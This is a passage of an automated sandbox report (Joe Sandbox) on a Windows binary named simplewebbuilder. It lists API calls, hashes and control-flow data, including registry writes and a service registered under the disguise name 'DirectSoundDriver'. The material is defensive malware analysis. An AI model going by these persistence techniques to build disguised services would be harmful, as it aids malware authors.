                                                                                                                            control_flow_graph 140 40226a-402272 RegQueryValueExA 141 40d0ce 140->141 142 40d8a4 141->142 143 40d0d4-40d0d6 141->143 143->142
                                                                                                                            APIs
                                                                                                                            • RegQueryValueExA.KERNELBASE ref: 0040226A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3660427363-0
                                                                                                                            • Opcode ID: 43a4795149afaa95ff49d7760f145aa27886ccc34a94ac535b3cf4f5122f40dc
                                                                                                                            • Instruction ID: cd8f19b0e75b23b67f056bc5011eb5fb97471f13f622c60d442dd2a780a17e7d
                                                                                                                            • Opcode Fuzzy Hash: 43a4795149afaa95ff49d7760f145aa27886ccc34a94ac535b3cf4f5122f40dc
                                                                                                                            • Instruction Fuzzy Hash: C7B09230E18102FADB255FB89F0C62A29647F447847364D36A857F10E0D6BD8A0AB51E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402A7C Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 145 402a7c-40dc37 CreateDirectoryA
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNELBASE ref: 0040DC31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4241100979-0
                                                                                                                            • Opcode ID: 2e1d1612e622339b26055c081b462bb1b5f10dc22293ef15fd6cbdadef8c59f8
                                                                                                                            • Instruction ID: 0e17b99c545429624e35815a83348e511bd8a70e8ccf8bf3b2f2de9a1ad67a53
                                                                                                                            • Opcode Fuzzy Hash: 2e1d1612e622339b26055c081b462bb1b5f10dc22293ef15fd6cbdadef8c59f8
                                                                                                                            • Instruction Fuzzy Hash: 65A0016599A214DAE22127D05A19A6A69286A1A78132580376382B10E249B9140FA6AF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D451 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 147 40d451-40d458 OpenSCManagerA
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ManagerOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1889721586-0
                                                                                                                            • Opcode ID: 9ed5e5ab46a34b1183b54c97295223e3599dc3336d81dfe18ed9d2878a1822e3
                                                                                                                            • Instruction ID: 1e8d8f9be64fba067e26ba2d448d73f2a2dd91e1f4fcd8f5598b6fd75d9e172d
                                                                                                                            • Opcode Fuzzy Hash: 9ed5e5ab46a34b1183b54c97295223e3599dc3336d81dfe18ed9d2878a1822e3
                                                                                                                            • Instruction Fuzzy Hash: F8A002A02045018AC6915F205FDC419255F6640316B611839D243E00E5CA789449A52E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D62B Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExA.KERNELBASE ref: 0040D62B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 969777215f77948ced44a4e344d970cab082f1d3304c2fcecb1ab55786fc3155
                                                                                                                            • Instruction ID: c74dabf9949369d5c62da8fd438f69c3850cb3cf4aa8c6dce4d298867a589fab
                                                                                                                            • Opcode Fuzzy Hash: 969777215f77948ced44a4e344d970cab082f1d3304c2fcecb1ab55786fc3155
                                                                                                                            • Instruction Fuzzy Hash: 0C9002203045019AD2501A315B0C2152598550464971104395647E1090DA748109991E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D578 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 149 40d578-40d57e RegCloseKey
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            • Opcode ID: 3e6d8f56397a6fd8f4d34382528745662e6caf6af1d865ec9120a216119d48a8
                                                                                                                            • Instruction ID: 046338ef49b4dad716f2584d43b15ea982064a3712732217e229f8b42be1af81
                                                                                                                            • Opcode Fuzzy Hash: 3e6d8f56397a6fd8f4d34382528745662e6caf6af1d865ec9120a216119d48a8
                                                                                                                            • Instruction Fuzzy Hash: FC900271955901A7C24007505F2D9153550611870132184376B46710E189F95407570E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402994 Relevance: 1.5, APIs: 1, Instructions: 3fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 148 402994-40299a CopyFileA
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CopyFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1304948518-0
                                                                                                                            • Opcode ID: 61d6449afb094023633c684944401277847045becdee46003d3530854dca8aa9
                                                                                                                            • Instruction ID: 8a9b989459de8ba4b383989f71eab82c3655f6d4a6f9597199558f747d970bc5
                                                                                                                            • Opcode Fuzzy Hash: 61d6449afb094023633c684944401277847045becdee46003d3530854dca8aa9
                                                                                                                            • Instruction Fuzzy Hash: 1A9002302041019AD2040A315B9C715276855046C131544796847E0090DA7880496529
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D1E3 Relevance: 1.3, APIs: 1, Instructions: 3stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1586166983-0
                                                                                                                            • Opcode ID: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
                                                                                                                            • Instruction ID: 1999ed2a319cb111f58d93e36599d65504c6bfb494e199db35daf75dc5fcdc4b
                                                                                                                            • Opcode Fuzzy Hash: 1133d926d828d468f2c0823ec2603520c2d080e7cd513d012715edb874195993
                                                                                                                            • Instruction Fuzzy Hash: 1F900260304201EFE2000B325F0C31525A46704641712443D5447E0194DA7C8005956A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 004028A4 Relevance: 1.5, APIs: 1, Instructions: 5serviceCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateService
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1592570254-0
                                                                                                                            • Opcode ID: 2e8116c818adf02881423c3d5d941bf26f5b1a2f7a4fd0b9110157fe06f65c55
                                                                                                                            • Instruction ID: 0602c40c1dbccdcc73e530ffc71a58eccebc0d0648145afbdcc57a56ac06b62b
                                                                                                                            • Opcode Fuzzy Hash: 2e8116c818adf02881423c3d5d941bf26f5b1a2f7a4fd0b9110157fe06f65c55
                                                                                                                            • Instruction Fuzzy Hash: 1BA02220808002CEC2002FE00E88028A0080082308330883EC30BF00C0CA38C88FB03F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(DirectSoundDriver 2.36.198.67,0040235E), ref: 004023C1
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 00402420
                                                                                                                            • GetLastError.KERNEL32 ref: 00402422
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                                                            • GetLastError.KERNEL32 ref: 00402450
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 00402480
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                                                                                            • SetServiceStatus.ADVAPI32(0040C418), ref: 004024CA
                                                                                                                            Strings
                                                                                                                            • DirectSoundDriver 2.36.198.67, xrefs: 004023BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                            • String ID: DirectSoundDriver 2.36.198.67
                                                                                                                            • API String ID: 3346042915-3753546761
                                                                                                                            • Opcode ID: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
                                                                                                                            • Instruction ID: 1a01264c41601166a4e66a8b54459f3afdfc7a3d4d59415bdd3a2783c39f4923
                                                                                                                            • Opcode Fuzzy Hash: 5fcb9a5b87dc8469fff6859aaf6bea1fa8643ec6b521037b188f0322a84c0a7e
                                                                                                                            • Instruction Fuzzy Hash: F821D670401210EBD2105F26EFE996A7EACFBC9754751823EE544B22B1C7B90409DF6C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406AC3 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B05
                                                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406B21
                                                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,7U@ ,?,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406B6A
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405537,00200020,00000000,?,00000000,00000000), ref: 00406BA2
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 352835431-3990396050
                                                                                                                            • Opcode ID: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
                                                                                                                            • Instruction ID: 02e506ee65740420ae3233abb4e535ac9c0d9cfafd58d7118099ca6790f9c1e8
                                                                                                                            • Opcode Fuzzy Hash: 7311542cf2bc8e314ac09162f2172350a795be2e08e0f18793ed5822aaba0d35
                                                                                                                            • Instruction Fuzzy Hash: FE51AE71500209EFDF219F54CE49EAF7FB5FB48750F11412AF952B22A0D73A8861EB68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406723 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004053C1,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 00406735
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040674D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040675E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040676B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                            • API String ID: 2238633743-4044615076
                                                                                                                            • Opcode ID: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
                                                                                                                            • Instruction ID: 7fc34865fb6cd96f75d35faf7655371ce0829d27f510573cbc416552b2b19a82
                                                                                                                            • Opcode Fuzzy Hash: d3419985ad88c67346e684d4d63523e685432ef50571a5d9d37b6701a5455ac8
                                                                                                                            • Instruction Fuzzy Hash: 5F018871200301EFCB209FB59EC096F3AE89B98745316183FB145F3291DE7A88118B6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040697A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 004069B9
                                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 004069D3
                                                                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A07
                                                                                                                            • MultiByteToWideChar.KERNEL32(7U@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405537,00200020,00000000,?,00000000,00000000,00000001), ref: 00406A3F
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406A95
                                                                                                                            • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00406AA7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 3852931651-3990396050
                                                                                                                            • Opcode ID: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                            • Instruction ID: 163a86b768802ebad6552dab4735af5f1520240db88ca7a198a85c033bcdd74c
                                                                                                                            • Opcode Fuzzy Hash: acbd839e8d8ecd8a78113468315f90f2f487c60c4e6f1d93c346ab407284bb9c
                                                                                                                            • Instruction Fuzzy Hash: 28418D71600209AFCF209F94CD86EAF3B69FB05750F11453AFA12B2290C7398D649B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040529D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0040530A
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004053E0
                                                                                                                            • WriteFile.KERNEL32(00000000), ref: 004053E7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                            • API String ID: 3784150691-4022980321
                                                                                                                            • Opcode ID: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                            • Instruction ID: 92436d38ab3050e8b35fbc92b936da31f470892ba1b2a307495bbf6c2249caee
                                                                                                                            • Opcode Fuzzy Hash: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                            • Instruction Fuzzy Hash: 54318372600618AEDB20A660CE4AF9B776CEB45344F5004BFF945B61C1EAB8AA448F5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404DB4 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DCF
                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DE3
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E0F
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E47
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E69
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403196), ref: 00404E82
                                                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E95
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404ED3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1823725401-0
                                                                                                                            • Opcode ID: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                            • Instruction ID: 56fc3daba095db5e8e6f62c072fe8221d0ae9ee3e10054882f672288d86757d0
                                                                                                                            • Opcode Fuzzy Hash: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                            • Instruction Fuzzy Hash: 8E31CDF25042555EDB206BA4DD8483BB69CFB85358716093BF782E3280EA798C5186E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 564119183-0
                                                                                                                            • Opcode ID: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                            • Instruction ID: a90e581a73a4811956ae2efad35f221ca7a2e3ffda059466d66554c94119bb76
                                                                                                                            • Opcode Fuzzy Hash: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                            • Instruction Fuzzy Hash: 21316E31A00355AFDB115FB49F889AF7B78EB45344B10807AFE86F72C1DA748845C7A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403302 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403356
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004033B6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                            • API String ID: 1385375860-4131005785
                                                                                                                            • Opcode ID: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                            • Instruction ID: 4b08c86a7d9428a74474774e457b3a663dfcff145a9399c9a999905afefb3de6
                                                                                                                            • Opcode Fuzzy Hash: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                            • Instruction Fuzzy Hash: 5331287190129869EB328B705C856DA3F6C9B02709F2404FFD544FA2C2DA789F868B19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404EE6 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00404F3F
                                                                                                                            • GetFileType.KERNEL32(00000800), ref: 00404FE5
                                                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 0040503E
                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 0040504C
                                                                                                                            • SetHandleCount.KERNEL32 ref: 00405083
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1710529072-0
                                                                                                                            • Opcode ID: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
                                                                                                                            • Instruction ID: 0a81f0dcc5ba0bfdc0506c3f5ccff14beb01dd10c6f3c9adb059a1ad3e4abaaf
                                                                                                                            • Opcode Fuzzy Hash: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
                                                                                                                            • Instruction Fuzzy Hash: B851377190460A8BD7208F38CE8476B3B90EB51724F19473EE5A2F72E1D7389845CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

